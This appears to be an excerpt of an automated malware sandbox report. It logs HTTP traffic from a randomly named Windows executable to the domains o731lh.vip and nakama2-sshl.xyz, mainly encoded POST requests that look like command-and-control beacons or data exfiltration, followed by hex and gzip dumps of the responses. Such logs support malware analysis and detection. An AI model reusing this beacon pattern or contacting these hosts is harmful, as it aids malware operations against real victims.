                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTAxZDQ1NDUtNTE2ZC00MjA1LTgzMjYtZDgxNzcwOTY5OWQ5IiwicGFnZV90aW1lIjoxNzI3MDk2MT


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.4497513.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:09.050831079 CEST714OUTPOST /eruc/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.o731lh.vip
                          Origin: http://www.o731lh.vip
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.o731lh.vip/eruc/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 75 72 41 6c 36 54 57 36 4f 43 34 61 2b 79 52 51 43 58 75 59 66 33 49 5a 71 41 32 51 31 35 4a 61 65 51 49 4a 62 63 56 70 2b 30 41 50 2b 6e 2b 5a 66 62 70 57 78 56 57 75 2b 76 56 52 52 69 59 6c 77 37 32 33 63 74 61 78 59 6e 6f 2f 54 6f 34 50 62 41 41 78 70 42 6d 31 6e 32 63 4f 34 38 78 71 46 66 78 54 6b 34 50 34 7a 63 32 71 57 46 63 67 64 52 36 57 44 77 79 62 51 34 59 75 55 70 51 6b 41 4b 64 68 64 42 79 61 36 39 52 2f 6c 52 4b 74 7a 34 68 4a 71 42 77 4b 46 32 4c 45 41 43 50 41 6c 54 36 4e 4d 4c 2f 43 53 48 4d 65 4d 33 2f 50 55 4f 68 38 66 51 3d 3d
                          Data Ascii: 3jE8o=5rvH253M/d+aurAl6TW6OC4a+yRQCXuYf3IZqA2Q15JaeQIJbcVp+0AP+n+ZfbpWxVWu+vVRRiYlw723ctaxYno/To4PbAAxpBm1n2cO48xqFfxTk4P4zc2qWFcgdR6WDwybQ4YuUpQkAKdhdBya69R/lRKtz4hJqBwKF2LEACPAlT6NML/CSHMeM3/PUOh8fQ==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.4497523.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:11.599400997 CEST734OUTPOST /eruc/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.o731lh.vip
                          Origin: http://www.o731lh.vip
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.o731lh.vip/eruc/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 39 61 64 30 41 4a 61 64 56 70 74 45 41 50 71 33 2f 53 43 72 70 4e 78 56 71 4d 2b 75 70 52 52 69 4d 6c 77 36 47 33 64 65 69 79 5a 33 6f 39 61 49 34 4e 56 67 41 78 70 42 6d 31 6e 32 5a 72 34 38 5a 71 46 76 68 54 6c 5a 50 2f 39 38 32 72 52 46 63 67 4c 52 36 73 44 77 7a 4f 51 38 59 45 55 76 4d 6b 41 49 56 68 61 56 75 5a 7a 39 52 39 76 78 4c 6c 79 5a 51 74 6a 67 4a 6b 41 58 48 51 66 43 44 55 6b 56 72 58 64 36 65 56 41 48 6f 74 52 77 32 37 5a 4e 63 31 45 62 68 31 48 52 36 74 61 42 39 39 6a 55 6d 64 32 78 64 69 77 50 4d 3d
                          Data Ascii: 3jE8o=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1L9ad0AJadVptEAPq3/SCrpNxVqM+upRRiMlw6G3deiyZ3o9aI4NVgAxpBm1n2Zr48ZqFvhTlZP/982rRFcgLR6sDwzOQ8YEUvMkAIVhaVuZz9R9vxLlyZQtjgJkAXHQfCDUkVrXd6eVAHotRw27ZNc1Ebh1HR6taB99jUmd2xdiwPM=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.4497533.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:14.193459988 CEST10816OUTPOST /eruc/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.o731lh.vip
                          Origin: http://www.o731lh.vip
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.o731lh.vip/eruc/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 46 61 65 44 41 4a 62 2b 74 70 75 45 41 50 31 48 2b 56 43 72 6f 66 78 52 2b 49 2b 75 6c 42 52 67 30 6c 78 63 36 33 49 66 69 79 53 33 6f 39 59 49 34 4f 62 41 42 31 70 42 57 35 6e 32 70 72 34 38 5a 71 46 73 4a 54 73 6f 50 2f 2f 38 32 71 57 46 63 73 64 52 37 69 44 30 66 65 51 38 63 2b 58 63 55 6b 44 72 39 68 62 67 79 5a 34 39 52 6a 73 78 4b 6a 79 5a 63 79 6a 67 56 43 41 57 44 36 66 41 66 55 6c 77 47 70 4d 49 62 4a 58 32 67 50 44 68 71 67 42 50 6b 6f 46 6f 6c 75 4a 44 4b 48 59 67 52 53 34 6d 76 61 7a 44 4a 66 68 4c 38 47 71 34 75 39 72 7a 56 6a 45 50 64 38 72 5a 63 32 54 42 2b 31 46 2f 36 2b 48 6e 33 7a 65 33 62 41 63 42 34 74 48 78 54 41 35 64 35 72 70 4e 54 35 77 71 30 43 57 6c 32 37 50 6e 4c 5a 33 4a 54 6b 37 74 79 56 77 56 4c 39 50 69 67 6e 6b 39 4c 44 6e 77 6e 46 64 41 6b 4f 37 73 32 39 6b 63 49 62 30 4f 69 53 58 54 36 79 37 77 31 56 76 36 58 5a 35 38 4d 41 [TRUNCATED]
                          Data Ascii: 3jE8o=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1LFaeDAJb+tpuEAP1H+VCrofxR+I+ulBRg0lxc63IfiyS3o9YI4ObAB1pBW5n2pr48ZqFsJTsoP//82qWFcsdR7iD0feQ8c+XcUkDr9hbgyZ49RjsxKjyZcyjgVCAWD6fAfUlwGpMIbJX2gPDhqgBPkoFoluJDKHYgRS4mvazDJfhL8Gq4u9rzVjEPd8rZc2TB+1F/6+Hn3ze3bAcB4tHxTA5d5rpNT5wq0CWl27PnLZ3JTk7tyVwVL9Pignk9LDnwnFdAkO7s29kcIb0OiSXT6y7w1Vv6XZ58MAA8fhwoVAZ+dc8YsxgmqpLdLUwhocdfYdUNes1TvvC4cScs5zCIRuRBfXO+LGZ4loJqJpMNt2J0Zaqs4HUEraNDqRPjrPmUFn3lMP3OBZHcUwVuv+xsgTlMNcSSPRyIDw6Ge0Lb1UEy77zMiL4KH3ZGkD4bWZhIsoOTOM7YNn1vvCbbdy2K4ii1rWzBYv+tlLuvTA282uDqJmkMVP8O4RHn7Oz+/uuhUVccSDJieMbsmQ1wF/QypsjLE5l9tHdWI7gZ2+Jd6+p9k16YjfaM3bQhMniSgASyWQog2RwJ567cFsdzXTstarxofttB0/NrZPicSKEjSPg+fYa+V6wJ7BmQ+M6+LNybh7UU3r6z7Z0ZW2fIUEUC6n+P1lmBuM/XOEFosf9EJ2Aol5AbHuYz0HjCVbzHElnCrqieADtU3tdttKu9ksoXyTfO/Cb8W/bmqpvJwCbotrxV0szUQ2OrZ0NsVK+aJhwbvqCzFfxATJQCKPHZB1hQs5/Lad/RPmnsiYoN2bvRQUiQFAvUNqFGairqBvEgnaZo/7limykDyQSCCucIpyoTcoCKuKwJPZOZM5EtFYHDjnRUbHGECYmDa0vt5NT/VjSDEI9ar/p1sujH/JdheMU2/DJ+GeQcSV3Ll2FSL2Mn5HYBekOfSc6hQmGfMuU5CbfRAS1K [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.4497543.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:16.737616062 CEST454OUTGET /eruc/?oB=mVppHlHxM&3jE8o=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.o731lh.vip
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:55:17.214919090 CEST394INHTTP/1.1 200 OK
                          Server: openresty
                          Date: Mon, 23 Sep 2024 12:55:17 GMT
                          Content-Type: text/html
                          Content-Length: 254
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 42 3d 6d 56 70 70 48 6c 48 78 4d 26 33 6a 45 38 6f 3d 30 70 48 6e 31 4d 32 67 77 61 4c 35 6d 71 6c 39 6a 53 69 35 44 68 70 6b 75 78 35 35 41 54 75 6f 46 47 4d 58 75 33 61 61 34 71 5a 49 46 68 49 5a 54 70 35 38 39 56 38 52 72 41 4f 62 53 38 73 65 2b 52 79 5a 6d 4a 64 6b 56 51 77 39 77 61 53 46 64 66 61 4a 51 41 39 72 54 62 70 58 44 47 42 37 38 78 57 69 6f 47 4e 57 6f 64 52 76 4b 65 6c 62 6f 4c 6e 32 7a 72 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oB=mVppHlHxM&3jE8o=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA="}</script></head></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.449755183.181.83.131802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:23.067734003 CEST732OUTPOST /ui3j/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.nakama2-sshl.xyz
                          Origin: http://www.nakama2-sshl.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.nakama2-sshl.xyz/ui3j/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 61 61 69 35 72 46 63 7a 36 59 46 54 36 30 62 33 4a 58 37 4c 39 76 72 6f 58 4f 61 73 70 45 4c 30 53 67 62 54 68 79 4e 34 6a 77 72 31 32 45 6b 6a 50 4f 2b 51 43 36 62 54 72 47 57 67 57 37 54 39 65 6d 31 4d 65 45 39 62 30 75 58 44 2b 58 45 55 52 5a 45 61 41 4d 6b 51 46 6b 68 4a 76 59 54 6e 52 2f 72 5a 41 44 52 41 66 42 31 64 30 2b 73 51 57 34 6c 4a 45 4e 48 41 56 62 57 64 59 51 48 65 46 57 38 44 54 6b 2f 43 63 46 31 4c 66 35 62 49 77 2f 4d 37 7a 30 54 56 49 77 62 62 35 4b 6c 57 4c 38 59 44 51 69 50 45 4a 4f 69 2f 54 59 47 4a 2b 65 49 32 79 51 3d 3d
                          Data Ascii: 3jE8o=Jx2AzDIVkhjYaai5rFcz6YFT60b3JX7L9vroXOaspEL0SgbThyN4jwr12EkjPO+QC6bTrGWgW7T9em1MeE9b0uXD+XEURZEaAMkQFkhJvYTnR/rZADRAfB1d0+sQW4lJENHAVbWdYQHeFW8DTk/CcF1Lf5bIw/M7z0TVIwbb5KlWL8YDQiPEJOi/TYGJ+eI2yQ==
                          Sep 23, 2024 14:55:24.056519985 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                          Content-Encoding: gzip
                          Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                          Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                          Sep 23, 2024 14:55:24.056585073 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                          Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                          Sep 23, 2024 14:55:24.056619883 CEST448INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                          Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                          Sep 23, 2024 14:55:24.056669950 CEST1236INData Raw: 3f 55 49 28 2f fc 8d 55 7d 6e 6b 90 31 6b cd b3 7a 60 54 cc 66 d4 be b2 36 05 85 ad 9e b2 fd c3 01 4a be 14 b5 a4 aa a5 aa f8 c6 44 b6 cd 8b 53 79 07 2f 89 e5 63 e5 6d 2f 1f ab 10 1e 06 ba ac 04 da 43 95 3a 4a 6c 4b bb 25 c7 ed 28 93 ca 9b 51 74
                          Data Ascii: ?UI(/U}nk1kz`Tf6JDSy/cm/C:JlK%(Qt:x-7hP2Ut{ol_-?h-J{{zl__O?CE@>&B'U=hiqZS0OPZB{`u$]kA&mHcv%*@u!k(U]
                          Sep 23, 2024 14:55:24.056701899 CEST1236INData Raw: ae 3f 7e 30 13 44 b4 60 5c 43 e8 ba a2 a4 2c 86 0b c6 16 21 1c 92 5e ce a1 6d 20 b5 6c 23 ac 49 2d 2f 9f 07 bb 25 0d 13 5a 1e aa cd 26 3a e3 ed 74 33 0a d7 0d b1 4f 61 0d a3 55 f6 f7 7c 75 4b 45 8b d7 d7 ec 10 04 6b ac e4 36 8f 3f 7c e5 f8 47 37
                          Data Ascii: ?~0D`\C,!^m l#I-/%Z&:t3OaU|uKEk6?|G7[pc_w_7}jgp4.|2(IWO?w@q#8xWo/p#De"5J(kjrl{#G
                          Sep 23, 2024 14:55:24.056735992 CEST1236INData Raw: 82 bd 50 56 70 0b 2c b9 21 85 1f 64 3a 61 4c cd 74 e8 70 42 57 15 f7 29 1a ad a4 60 ad 11 32 36 23 67 07 af f3 a0 32 38 fa 1c 9b ec f1 1b 38 57 bc 70 fc 1a b4 1b 1f de 1e cb 68 8c 4f ca 75 6c 51 16 47 a2 4f 8c 65 59 2d 4f c1 2a c5 d4 c8 23 23 3d
                          Data Ascii: PVp,!d:aLtpBW)`26#g288WphOulQGOeY-O*##=fsCMPYKXpYuLU8@DgaA(Ot0, IX;Cu6QRp0%8|'8z)8rAaN8|Wqd!n~|+$S4U`i
                          Sep 23, 2024 14:55:24.056765079 CEST98INData Raw: 70 b5 a0 0d 9e 21 a4 ad 5c 5a 2e a9 09 e7 c6 86 7c 83 94 45 64 66 90 84 20 c0 e9 e1 f5 70 82 11 fe 5a 69 2f 45 9c 48 17 40 f5 72 2c 85 8d c7 fe 88 2c c3 78 77 31 5d a1 c7 0b 61 f0 8a 60 bc 84 78 40 23 59 01 14 0b e8 71 70 a6 e2 41 34 f1 77 ce ff
                          Data Ascii: p!\Z.|Edf pZi/EH@r,,xw1]a`x@#YqpA4wh^0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.449756183.181.83.131802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:25.714592934 CEST752OUTPOST /ui3j/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.nakama2-sshl.xyz
                          Origin: http://www.nakama2-sshl.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.nakama2-sshl.xyz/ui3j/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 76 30 53 43 44 54 69 33 68 34 69 77 72 31 69 55 6b 36 42 75 2b 62 43 36 47 75 72 47 71 67 57 34 76 39 65 6a 5a 4d 65 58 6c 59 37 65 58 42 34 58 45 57 53 70 45 61 41 4d 6b 51 46 6b 45 55 76 59 4c 6e 52 50 37 5a 42 69 52 44 44 78 31 43 7a 2b 73 51 53 34 6c 46 45 4e 48 69 56 61 36 6e 59 56 4c 65 46 57 73 44 54 32 58 42 4a 31 31 4a 52 5a 61 6e 38 66 6c 32 7a 33 36 35 50 7a 33 55 2f 4b 52 4f 44 61 4a 5a 42 54 75 54 62 4f 47 4d 4f 66 50 39 7a 64 31 2f 70 66 2f 72 67 36 72 52 36 57 62 61 31 73 4c 6f 64 75 50 4c 31 41 55 3d
                          Data Ascii: 3jE8o=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2v0SCDTi3h4iwr1iUk6Bu+bC6GurGqgW4v9ejZMeXlY7eXB4XEWSpEaAMkQFkEUvYLnRP7ZBiRDDx1Cz+sQS4lFENHiVa6nYVLeFWsDT2XBJ11JRZan8fl2z365Pz3U/KRODaJZBTuTbOGMOfP9zd1/pf/rg6rR6Wba1sLoduPL1AU=
                          Sep 23, 2024 14:55:26.580348969 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                          Content-Encoding: gzip
                          Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                          Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                          Sep 23, 2024 14:55:26.580399990 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                          Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                          Sep 23, 2024 14:55:26.580435038 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                          Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                          Sep 23, 2024 14:55:26.580472946 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                          Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                          Sep 23, 2024 14:55:26.580508947 CEST896INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                          Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                          Sep 23, 2024 14:55:26.580626965 CEST886INData Raw: 7b 3a d7 04 84 eb 2c 54 17 a0 4e c8 2b 43 cb 26 f2 2a 42 52 66 e8 94 ac f8 df ca f5 32 8b a0 1d 8a cc 58 e9 56 99 eb 49 3a c2 6f b3 aa c3 e0 f8 d4 b2 f8 36 ab 9a 4c ae ff ff cd aa 86 5e 26 8c 43 c4 a1 4a fc 89 79 1e 5e 01 81 48 2e 1c c1 fd 07 45
                          Data Ascii: {:,TN+C&*BRf2XVI:o6L^&CJy^H.E?)xB}1&vklnnX#)VsTmGQWWZ_"g??qzjNHm}nj}l\J7rtKMW$[Xm5#k}<Z52U\X


